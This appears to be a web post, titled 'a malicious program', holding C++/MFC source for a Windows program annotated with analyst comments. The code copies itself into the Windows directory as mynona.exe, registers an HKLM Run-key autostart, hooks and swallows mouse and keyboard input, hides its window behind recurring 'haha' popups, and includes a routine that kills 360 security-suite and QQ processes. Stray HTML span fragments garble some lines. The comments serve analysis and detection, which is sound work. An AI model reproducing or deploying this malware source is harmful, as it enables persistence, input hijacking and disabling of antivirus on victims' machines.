
一个恶意程序

Jun 13, 2016 am 11:31 AM


// KeyBoardHookDialogDlg.cpp : implementation file
//
// Analyst summary of this listing: an MFC dialog application that copies itself
// into the Windows directory as mynona.exe (CopySelf), registers that copy under
// the HKLM Run key (autoRun), installs thread-scoped mouse/keyboard hooks that
// swallow input (MouseProc/KeyboardProc), and contains an unused routine that
// terminates 360 security-suite and QQ processes (ShowProcess).

#include "stdafx.h"
#include "KeyBoardHookDialog.h"
#include "KeyBoardHookDialogDlg.h"
// HKLM autorun key written by autoRun(); the value name used there is "mynona".
// Changes to this key are a standard persistence telemetry point (Autoruns,
// registry value-set events).
#define REG_RUN "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
// Tool Help API: needed for the process snapshot used by ShowProcess().
#include <tlhelp32.h>

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
//#pragma comment (lib,"KeyBoardHook")

<span ///////////////////////////////////////////////////////////////////////////</span><span //</span>

<span //</span><span  CAboutDlg dialog used for App About

// Global HHOOK variables used to keep the installed hook handles
HHOOK  g_hMouse;      // WH_MOUSE hook handle; set in OnInitDialog(), unhooked in KeyboardProc() on F2
HHOOK  g_hKeyboard;   // WH_KEYBOARD hook handle; same lifecycle as g_hMouse
bool isTrue = false;  // set to true at the end of OnInitDialog(); while true, OnTimer() re-hides the window on every tick

HWND hWnd; // saves the dialog's own window handle (m_hWnd) so the free-function hook can send it WM_CLOSE

// Note: the two hook procedures below are global (free) functions, so the APIs
// inside them are called through the global namespace (::) rather than as CWnd members

// WH_MOUSE hook procedure, installed in OnInitDialog() for the current thread only.
// It returns 1 for every call and never invokes CallNextHookEx, so mouse messages
// destined for this thread's windows are suppressed rather than passed on.
LRESULT CALLBACK MouseProc(
  int nCode,      // hook code
  WPARAM wParam,  // message identifier
  LPARAM lParam   // mouse coordinates
  )
 {
    return 1;   // nonzero: the message is not delivered
 }

 

// WH_KEYBOARD hook procedure, installed in OnInitDialog() for the current thread only.
// Every keystroke is swallowed (the function always returns 1 and the only
// CallNextHookEx call is inside the commented-out block). The single live
// behaviour is the author's "back door": when wParam is VK_F2 the saved dialog
// handle receives WM_CLOSE and both hooks are removed. The hook code is not
// inspected and lParam is unused, so this branch presumably runs on both the
// key-down and key-up calls for F2.
LRESULT CALLBACK KeyboardProc(
  int code,       // hook code
  WPARAM wParam,  // virtual-key code
  LPARAM lParam   // keystroke-message information
)
{
    //  if(VK_SPACE == wParam || VK_RETURN == wParam) // block the Space and Enter keys
     /*   if(VK_F4 == wParam && (lParam>>29 & 1)) // block ALT + F4
            return 1;
       else
            return CallNextHookEx(g_hKeyboard,code,wParam,lParam);*/
    // Leave a back door: when F2 is pressed the program exits
       if(VK_F2 == wParam)
       {
           // Use the global SendMessage to send the close message to the dialog
           ::SendMessage(hWnd,WM_CLOSE,0,0);
           // Remove the hooks
           UnhookWindowsHookEx(g_hMouse);
           UnhookWindowsHookEx(g_hKeyboard);
       }
       return 1;   // nonzero: the keystroke is not delivered
}

 

 

// About-box dialog. This appears to be the stock AppWizard declaration; nothing
// in this listing adds behaviour to it.
class CAboutDlg : public CDialog
{
public:
    CAboutDlg();

// Dialog Data
    //{{AFX_DATA(CAboutDlg)
    enum { IDD = IDD_ABOUTBOX };
    //}}AFX_DATA

    // ClassWizard generated virtual function overrides
    //{{AFX_VIRTUAL(CAboutDlg)
    protected:
    virtual void DoDataExchange(CDataExchange* pDX);    // DDX/DDV support
    //}}AFX_VIRTUAL

// Implementation
protected:
    //{{AFX_MSG(CAboutDlg)
    //}}AFX_MSG
    DECLARE_MESSAGE_MAP()
};

 

// Constructs the About box from its dialog-template resource (wizard-generated).
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
    //{{AFX_DATA_INIT(CAboutDlg)
    //}}AFX_DATA_INIT
}

 

// DDX/DDV support for the About box; only forwards to the base class (wizard-generated).
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
    CDialog::DoDataExchange(pDX);
    //{{AFX_DATA_MAP(CAboutDlg)
    //}}AFX_DATA_MAP
}

 

// Empty message map for the About box (wizard-generated).
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
    //{{AFX_MSG_MAP(CAboutDlg)
        // No message handlers
    //}}AFX_MSG_MAP
END_MESSAGE_MAP()

 

</span><span ///////////////////////////////////////////////////////////////////////////</span><span //</span>

<span //</span><span  CKeyBoardHookDialogDlg dialog</span>

<span

// Constructs the main dialog and loads the application icon (wizard-generated).
// All of the non-template behaviour of this program is in OnInitDialog().
CKeyBoardHookDialogDlg::CKeyBoardHookDialogDlg(CWnd* pParent /*=NULL*/)
    : CDialog(CKeyBoardHookDialogDlg::IDD, pParent)
{
    //{{AFX_DATA_INIT(CKeyBoardHookDialogDlg)
        // NOTE: the ClassWizard will add member initialization here
    //}}AFX_DATA_INIT
    // Note that LoadIcon does not require a subsequent DestroyIcon in Win32
    m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}

 

// DDX/DDV support for the main dialog; only forwards to the base class (wizard-generated).
void CKeyBoardHookDialogDlg::DoDataExchange(CDataExchange* pDX)
{
    CDialog::DoDataExchange(pDX);
    //{{AFX_DATA_MAP(CKeyBoardHookDialogDlg)
        // NOTE: the ClassWizard will add DDX and DDV calls here
    //}}AFX_DATA_MAP
}

 

// Message map for the main dialog. Besides the wizard handlers it routes the
// IDC_BTN_HOOKON button to OnBtnHookon() (which is empty in this listing) and
// WM_TIMER to OnTimer(), which fires on the 2-second timer started in OnInitDialog().
BEGIN_MESSAGE_MAP(CKeyBoardHookDialogDlg, CDialog)
    //{{AFX_MSG_MAP(CKeyBoardHookDialogDlg)
    ON_WM_SYSCOMMAND()
    ON_WM_PAINT()
    ON_WM_QUERYDRAGICON()
    ON_BN_CLICKED(IDC_BTN_HOOKON, OnBtnHookon)
    ON_WM_TIMER()
    //}}AFX_MSG_MAP
END_MESSAGE_MAP()

 

</span><span ///////////////////////////////////////////////////////////////////////////</span><span //</span>

<span //</span><span  CKeyBoardHookDialogDlg message handlers</span>

<span

// WM_INITDIALOG handler. The first half is the wizard template (system-menu
// About entry, icons). The tail is where the program's real behaviour starts,
// in this order:
//   1. CopySelf()  - copies the running executable to <Windows dir>\mynona.exe
//   2. autoRun()   - writes an HKLM Run value named "mynona" pointing at that copy
//   3. installs WH_MOUSE and WH_KEYBOARD hooks; hMod is NULL and the thread id is
//      GetCurrentThreadId(), so these are thread-scoped, not system-wide hooks
//   4. saves m_hWnd in the global hWnd for KeyboardProc()
//   5. starts timer 1 at 2000 ms (OnTimer) and sets the global isTrue
// ShowProcess() (process termination) is present in the file but commented out here.
// For defenders, the durable artifacts are the file from step 1 and the Run value
// from step 2; both need write access to %WINDIR% / HKLM, otherwise they silently fail.
BOOL CKeyBoardHookDialogDlg::OnInitDialog()
{
    CDialog::OnInitDialog();

    // Add "About..." menu item to system menu.

    // IDM_ABOUTBOX must be in the system command range.
    ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
    ASSERT(IDM_ABOUTBOX < 0xF000);

    CMenu* pSysMenu = GetSystemMenu(FALSE);
    if (pSysMenu != NULL)
    {
        CString strAboutMenu;
        strAboutMenu.LoadString(IDS_ABOUTBOX);
        if (!strAboutMenu.IsEmpty())
        {
            pSysMenu->AppendMenu(MF_SEPARATOR);
            pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
        }
    }

    // Set the icon for this dialog.  The framework does this automatically
    //  when the application's main window is not a dialog
    SetIcon(m_hIcon, TRUE);            // Set big icon
    SetIcon(m_hIcon, FALSE);        // Set small icon

    // TODO: Add extra initialization here

    CopySelf();
    autoRun();// registry autorun (Run key)
        // install the hooks
//     ShowProcess();
    g_hMouse = SetWindowsHookEx(WH_MOUSE,MouseProc,NULL,GetCurrentThreadId());
    g_hKeyboard = SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,NULL,GetCurrentThreadId());
    // save the window handle for the hook procedure
    hWnd = m_hWnd;

    SetTimer(1, 2000, NULL);   // timer id 1, 2 s period -> OnTimer()
    isTrue = true;
    return TRUE;  // return TRUE  unless you set the focus to a control
}

 

// WM_SYSCOMMAND handler (wizard-generated): the About command opens CAboutDlg
// modally, every other system command goes to the CDialog default.
void CKeyBoardHookDialogDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
    const bool isAboutCommand = (nID & 0xFFF0) == IDM_ABOUTBOX;
    if (!isAboutCommand)
    {
        CDialog::OnSysCommand(nID, lParam);
        return;
    }

    CAboutDlg aboutBox;
    aboutBox.DoModal();
}

 

</span><span //</span><span  If you add a minimize button to your dialog, you will need the code below

</span><span //</span><span   to draw the icon.  For MFC applications using the document/view model,

</span><span //</span><span   this is automatically done for you by the framework.</span>

 

// WM_PAINT handler (wizard-generated). When the dialog is minimized it draws
// the application icon centered in the client area; otherwise the base-class
// painting is used.
void CKeyBoardHookDialogDlg::OnPaint()
{
    if (!IsIconic())
    {
        CDialog::OnPaint();
        return;
    }

    CPaintDC paintDc(this); // device context for painting

    SendMessage(WM_ICONERASEBKGND, (WPARAM) paintDc.GetSafeHdc(), 0);

    // Center icon in client rectangle
    const int iconWidth = GetSystemMetrics(SM_CXICON);
    const int iconHeight = GetSystemMetrics(SM_CYICON);
    CRect clientRect;
    GetClientRect(&clientRect);
    const int left = (clientRect.Width() - iconWidth + 1) / 2;
    const int top = (clientRect.Height() - iconHeight + 1) / 2;

    // Draw the icon
    paintDc.DrawIcon(left, top, m_hIcon);
}

 

</span><span //</span><span  The system calls this to obtain the cursor to display while the user drags

</span><span //</span><span   the minimized window.</span>

// Returns the cursor shown while the user drags the minimized window
// (wizard-generated): the application icon is reused as the cursor.
HCURSOR CKeyBoardHookDialogDlg::OnQueryDragIcon()
{
    return static_cast<HCURSOR>(m_hIcon);
}

 

 

// Click handler for IDC_BTN_HOOKON. Empty: the hooks are installed unconditionally
// from OnInitDialog(), so the button has no effect in this listing.
void CKeyBoardHookDialogDlg::OnBtnHookon()
{
    // TODO: Add your control notification handler code here

}

 

</span><span //</span><span DEL void CKeyBoardHookDialogDlg::OnBtnHookoff()

</span><span //</span><span DEL {

</span><span //</span><span DEL     </span><span //</span><span  TODO: Add your control notification handler code here

</span><span //</span><span DEL     SetHookOff();

</span><span //</span><span DEL    

</span><span //</span><span DEL }</span>

 

// Hides the dialog window. Not referenced anywhere in this listing; OnTimer()
// calls ShowWindow(SW_HIDE) directly instead.
void CKeyBoardHookDialogDlg::hide()
{
        ShowWindow(SW_HIDE);
}

 

 

// Persistence: registers the copied executable under HKLM\<REG_RUN> as a REG_SZ
// value named "mynona". szWindowsPath is declared outside this listing
// (presumably a char buffer, filled by CopySelf() with "<Windows dir>\mynona.exe"),
// so autoRun() only makes sense after CopySelf() has run, which is the order used
// in OnInitDialog(). If the HKLM key cannot be opened (e.g. insufficient rights)
// the function returns silently and no persistence is written.
void CKeyBoardHookDialogDlg::autoRun()
{

        HKEY hKey = NULL;
        LONG lRet = RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&hKey);

        if(lRet != ERROR_SUCCESS)
        {
            return;   // no rights / key missing: persistence silently skipped
        }

        // Value data is the path string plus its terminating NUL (strlen + sizeof(char)).
        RegSetValueEx(hKey,"mynona",NULL,REG_SZ,(const unsigned char *)&szWindowsPath,
            strlen(szWindowsPath) +sizeof(char));

        RegCloseKey(hKey);
}

 

// Defence-evasion routine (not called in this listing; its call in OnInitDialog()
// is commented out). Walks a Tool Help process snapshot and, for any process whose
// image name matches QQ.exe, 360tray.exe or 360rp.exe (the latter two belong to
// the 360 security suite), pops a MessageBox with the name, opens the process with
// PROCESS_TERMINATE and calls TerminateProcess on it.
// Observations on the code as written: lpExitCode is a null LPDWORD, so
// GetExitCodeProcess has nowhere to write and the pointer value itself is what is
// cast to UINT as the exit code; neither hSnap nor hProcess is ever closed.
void CKeyBoardHookDialogDlg::ShowProcess()
{

    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
    //...

    PROCESSENTRY32 Pe32 = {0};
    Pe32.dwSize = sizeof(PROCESSENTRY32);
    int bRet = Process32First(hSnap,&Pe32);
    //360IOSMgrSrv 360tray
    // Target image names compared against Pe32.szExeFile (case-sensitive strcmp).
    char name[MAX_PATH] = "QQ.exe";
    char name2[MAX_PATH] = "360tray.exe";
    char name3[MAX_PATH] = "360rp.exe";
    while(bRet)
    {
        //...
        bRet = Process32Next(hSnap,&Pe32);
        //cout<<"id:"<<Pe32.th32ProcessID<<"   name:"<<Pe32.szExeFile<<endl;

        int flag = 0;
        if(strcmp(Pe32.szExeFile,name) == 0 || strcmp(Pe32.szExeFile,name3) == 0 || strcmp(Pe32.szExeFile,name2) ==0)
            flag = 1;
        if(flag){
        //     cout<<"----------------------"<<Pe32.th32ProcessID<<endl;
            MessageBox(Pe32.szExeFile);   // modal; announces the matched process name
            HANDLE hProcess = OpenProcess(PROCESS_TERMINATE,FALSE,Pe32.th32ProcessID);
            LPDWORD lpExitCode = 0;       // null pointer, see note above
            GetExitCodeProcess(hProcess, lpExitCode);
            TerminateProcess(hProcess, (UINT)lpExitCode);
        }
    }
}

 

// Self-replication: copies the running executable to "<Windows dir>\mynona.exe",
// overwriting any existing file (CopyFile with bFailIfExists = FALSE). The
// destination path is built in szWindowsPath, which is declared outside this
// listing and is later reused by autoRun() as the Run-key value. A MessageBox
// showing the destination path is left in (debug leftover), so the copy is not
// silent. Writing into the Windows directory requires corresponding rights; the
// CopyFile result is stored in a local that is never checked. szTmpPath is
// declared but unused, and the local isTrue shadows the global flag of the same name.
void CKeyBoardHookDialogDlg::CopySelf()
{

     char szSelfName[MAX_PATH] = {0};
    // char szSystemPath[MAX_PATH] = {0};
     char szTmpPath[MAX_PATH] = {0};   // unused

     // get this program's own path
     GetModuleFileName(NULL,szSelfName,MAX_PATH);
     //cout<<"szSelfName:"<<szSelfName<<endl;

     // get the Windows directory (original comment said "system directory")
     GetWindowsDirectory(szWindowsPath,MAX_PATH);
   //   cout<<"szWindowsPath:"<<szWindowsPath<<endl;

     // get the system directory (disabled)
   //   GetSystemDirectory(szSystemPath,MAX_PATH);
     //cout<<"szSystemPath:"<<szSystemPath<<endl;

     strcat(szWindowsPath,"\\mynona.exe");   // destination file name: the on-disk IoC
     //strcat(szSystemPath,"\\mynona.exe");

     MessageBox( szWindowsPath,": szWindowsPath");
     //MessageBox( szSystemPath,": szSystemPath");

     int isTrue = CopyFile(szSelfName,szWindowsPath,FALSE);// FALSE means overwrite an existing file
   //   int isTrue2 = CopyFile(szSelfName,szSystemPath,FALSE);

}

 

// WM_TIMER handler, driven by the 2 s timer started in OnInitDialog(). On every
// tick it re-hides the dialog while the global isTrue is set, then shows a modal
// MessageBox ("haha" / "哈哈", stop icon). The timer id is not checked, so any
// timer on this window triggers the same behaviour. The recurring modal box is
// the program's only user-visible activity once the dialog is hidden.
void CKeyBoardHookDialogDlg::OnTimer(UINT nIDEvent)
{
    // TODO: Add your message handler code here and/or call default
    if(isTrue){
        ShowWindow(SW_HIDE);
    }
    MessageBox("haha","哈哈",MB_ICONSTOP);

    CDialog::OnTimer(nIDEvent);
}


 
